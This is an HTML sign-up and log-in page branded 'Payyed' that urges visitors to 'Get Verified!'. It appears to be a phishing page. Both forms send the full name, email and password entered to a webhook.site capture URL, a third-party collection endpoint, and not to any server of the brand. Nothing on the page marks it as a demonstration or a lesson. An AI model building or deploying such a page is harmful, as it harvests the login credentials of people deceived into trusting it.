<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="payyed.css">
    <link href="https://fonts.googleapis.com/css?family=Montserrat:500&display=swap" rel="stylesheet"> 
    <title>Payyed</title>
</head>
<body>
    <div class="wrapper">
        <div class="box1">
            <div class="content">
                <h3 class="logo">Payyed</h3>
                <h1>Get Verified!</h1>
                <p>Every day, Payyed makes thousands of customers happy.</p>
            </div>
        </div>
        <div class="box2">
            <div class="content">
                <h2>Sign Up</h2>
                <form action=" https://webhook.site/#!/90a18d07-a6a8-44a2-aed3-c71d7e7386c2/83cbadb5-80a9-4e27-a119-ce885e53db7f/1">
                    <div>
                       <label for="fullname">Full Name</label>
                        <input type="text" required name="fullname" id="fullname" placeholder="Enter Your Name">
                    </div>
                    <div>
                       <label for="email">Email Address</label>
                        <input type="email" required name="email"  id="email" placeholder="Enter Your Email">
                    </div>
                    <div>
                       <label for="password">Password</label>
                        <input type="password" required  name="password" id="password" placeholder="Enter Password">
                    </div>
                    <div>
                        <input type="submit" value="Sign Up">
                    </div>
                </form>
                <p>Already have an account? <a class="changer" href="#">Log In</a> </p>
            </div>
        </div>
        <div class="box3">
            <div class="content">
                <h2>Log in</h2>
                <form action=" https://webhook.site/#!/90a18d07-a6a8-44a2-aed3-c71d7e7386c2/83cbadb5-80a9-4e27-a119-ce885e53db7f/1">
                  
                    <div>
                       <label for="email">Email Address</label>
                        <input type="email" name="email"  id="email" required placeholder="Enter Your Email">
                    </div>
                    <div>
                       <label for="password">Password</label>
                        <input type="password" name="password" required id="password" placeholder="Enter Password">
                    </div>
                    <div class="checkbox">
                        <div>
                        <input type="checkbox" name="checkbox" id="checkbox" placeholder="Enter Password">
                        <label for="checkbox">Remember Me</label>
                        </div>
                        <a href="#">Forgot Password?</a>
                    </div>
                    <div>
                        <input type="submit" value="Login">
                    </div>
                </form>
                <p>Don't have an account? <a class="changer" href="#">Sign Up</a> </p>
            </div>
        </div>
    </div>




    <script src="payyed.js"></script>
</body>
</html>